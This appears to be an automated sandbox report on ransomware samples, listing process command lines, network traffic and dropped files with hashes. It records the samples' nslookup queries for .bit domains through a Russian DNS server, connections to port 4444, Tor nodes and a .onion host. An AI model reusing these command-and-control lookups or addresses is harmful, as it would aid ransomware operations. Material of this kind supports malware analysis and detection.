"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:8

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5448 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Windows\SysWOW64\nslookup.exe

nslookup emsisoft.bit dns1.soprodns.ru

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcedc746f8,0x7ffcedc74708,0x7ffcedc74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3112 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3112 /prefetch:8

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup emsisoft.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 35.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 42.56.20.217.in-addr.arpa udp
US 65.49.8.96:443 tcp
BA 77.238.193.186:4444 tcp
US 128.31.0.39:9131 128.31.0.39 tcp
RU 45.151.62.188:443 tcp
US 8.8.8.8:53 39.0.31.128.in-addr.arpa udp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 188.62.151.45.in-addr.arpa udp
US 8.8.8.8:53 41.219.218.216.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 ipv4bot.whatismyipaddress.com udp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 comaddutilspec.work udp
US 8.8.8.8:53 comaddutilspec.xyz udp
US 8.8.8.8:53 comaddutilspec.com udp
US 216.218.219.41:80 216.218.219.41 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 imzombie13.tk udp
DE 193.23.244.244:80 193.23.244.244 tcp
US 8.8.8.8:53 244.244.23.193.in-addr.arpa udp
N/A 127.0.0.1:8668 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 65.49.8.96:443 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 65.49.8.96:443 tcp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
DE 5.189.155.39:9001 tcp
US 8.8.8.8:53 39.155.189.5.in-addr.arpa udp
US 216.218.219.41:80 216.218.219.41 tcp
N/A 127.0.0.1:8668 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 65.49.8.96:443 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
N/A 127.0.0.1:8668 tcp
US 65.49.8.96:443 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
LU 107.189.1.198:443 tcp
N/A 127.0.0.1:8668 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 198.1.189.107.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
GB 88.221.135.24:443 www.bing.com tcp
GB 88.221.135.24:443 www.bing.com tcp
US 8.8.8.8:53 24.135.221.88.in-addr.arpa udp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
GB 88.221.135.24:80 www.bing.com tcp
GB 88.221.135.24:80 www.bing.com tcp
US 8.8.8.8:53 r.bing.com udp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
US 8.8.8.8:53 219.143.101.95.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:8668 tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
US 8.8.8.8:53 assets.msn.com udp
GB 95.101.143.98:443 assets.msn.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.68:443 login.microsoftonline.com tcp
GB 173.222.211.40:443 aefd.nelreports.net tcp
N/A 127.0.0.1:8668 tcp
GB 173.222.211.40:443 aefd.nelreports.net tcp
US 8.8.8.8:53 98.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 65.49.8.96:443 tcp
US 8.8.8.8:53 200.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 40.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 www.msn.com udp
US 8.8.8.8:53 c.msn.com udp
IE 13.74.129.1:443 c.msn.com tcp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 c.bing.com udp
GB 95.101.143.98:443 assets.msn.com tcp
US 52.168.117.170:443 browser.events.data.msn.com tcp
US 52.168.117.170:443 browser.events.data.msn.com tcp
US 204.79.197.237:443 c.bing.com tcp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
GB 173.222.211.43:443 img-s-msn-com.akamaized.net tcp
GB 173.222.211.43:443 img-s-msn-com.akamaized.net tcp
GB 173.222.211.43:443 img-s-msn-com.akamaized.net tcp
GB 173.222.211.43:443 img-s-msn-com.akamaized.net tcp
US 8.8.8.8:53 1.129.74.13.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 43.211.222.173.in-addr.arpa udp
N/A 127.0.0.1:8668 tcp
GB 88.221.134.3:443 th.bing.com tcp
US 8.8.8.8:53 3.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 services.bingapis.com udp
N/A 127.0.0.1:8668 tcp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 www.torproject.org udp
DE 116.202.120.165:443 www.torproject.org tcp
DE 116.202.120.165:443 www.torproject.org tcp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 165.120.202.116.in-addr.arpa udp
DE 116.202.120.165:443 www.torproject.org tcp
DE 116.202.120.165:443 www.torproject.org tcp
DE 116.202.120.165:443 www.torproject.org tcp
DE 116.202.120.165:443 www.torproject.org tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 dist.torproject.org udp
US 204.8.99.144:443 dist.torproject.org tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 144.99.8.204.in-addr.arpa udp
NL 204.137.14.106:443 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 106.14.137.204.in-addr.arpa udp
US 8.8.8.8:53 173.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 65.49.8.96:443 tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 204.8.99.144:443 dist.torproject.org tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 94.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 65.49.8.96:443 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
KR 180.80.144.44:9001 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
N/A 127.0.0.1:8668 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
US 8.8.8.8:53 44.144.80.180.in-addr.arpa udp
US 216.218.219.41:80 216.218.219.41 tcp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 65.49.8.96:443 tcp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp

Files

memory/3036-128-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-129-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-130-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-135-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-140-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-139-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-138-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-137-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-136-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-134-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

MD5 6bd369f7c74a28194c991ed1404da30f
SHA1 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA512 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

MD5 d2fb266b97caff2086bf0fa74eddb6b2
SHA1 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256 b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512 c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

memory/2356-157-0x000001D83C860000-0x000001D83C882000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w013rfqk.5rt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2356-167-0x000001D83D7D0000-0x000001D83D814000-memory.dmp

memory/2356-168-0x000001D83D8A0000-0x000001D83D916000-memory.dmp

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe

MD5 3f37958d8846628731b5e49d2c525bd9
SHA1 d8e48e6d355c62a76dfa557c86efbe0cca9133dc
SHA256 40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277
SHA512 880ffadae42902ba36d4536f04ba11aff7041972e00f7e6c370a72bacfe1e6ded220da739900b707a557de049d53a4013344560eb6d199e5dcb3bd998ff2c8d3

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe

MD5 3af5a7b50dd8f9fa3fa858f445623c39
SHA1 0d0deb521578ec8618111257615108acf109b4fa
SHA256 7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2
SHA512 0630f2d4c6f40bf4cea157d877a2e54a6ef4c5fae3ca1d9e63d219aab30566ad8071f0f03b01c936cd05eb25f348e5eb494e599d3c68bca1ec52ac76f753319a

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe

MD5 665aab2ffae2eeeee8eb847e9bb69ebc
SHA1 8864a2662cbc6b09a557109111bd8b7d59d32b02
SHA256 d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63
SHA512 db56810f077a1a2fa8e41420c85e4b17287d4cf5616a4d8f59a2d2cb3e5cbb5becc28b4a956f13b1c13446c878d506154aa3db1df1f942dbe22704c9420ce9c5

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe

MD5 d962d419315bba0ebc87e52ac07525f7
SHA1 6a42f7b6bde962cb6c091855de71ea5009252e59
SHA256 5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766
SHA512 53ebca83801b71e10832e87e203d1588f581fd3313b4d5070fb8c7ddb7361e6abd9620ba2624b689e5fc5f1c0c12ac1adf090bbe13327851f8a25f668722615f

memory/3396-183-0x0000000000040000-0x000000000005A000-memory.dmp

memory/3396-186-0x0000000004EA0000-0x0000000005444000-memory.dmp

memory/3396-188-0x0000000004990000-0x0000000004A22000-memory.dmp

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe

MD5 c3e3c86fde3bcd274d6ab8b34b317dcd
SHA1 3b8b97d4859df70429f616dda2ff97fc3100860d
SHA256 cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366
SHA512 25bef0a7edd508fb77b2852c1f9db4e4ccdc0ff40aa6201fc5210dcb4aaa97fc0e76a19e27331e1040e5821edfaf95aa18fca60ad33211fdc6c303c3defdcc25

memory/3012-191-0x0000000000E10000-0x0000000000E44000-memory.dmp

memory/3396-194-0x0000000004920000-0x000000000492A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe

MD5 a18c062bb0ce203fdff331c992de269c
SHA1 eae83f7e1ad214972defb84c43ea036fc6d5115e
SHA256 c097471fea6d03ff188f977d3ace14128fc5db56ec813e555bf3ac8d20e88b7b
SHA512 977fc4d1d72d742c3776233d15245f3e5dead9995b8d7a95c2f0235f42ee7ef4472fd384d24cda1d6ea266c220a25b1a695bbe50edcf289583da9763055a7a12

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe

MD5 9ea73eb6b9b9bc5fb7ba8bbef5511eb5
SHA1 100bc3545d192cdfd5952650c9ad14899562c322
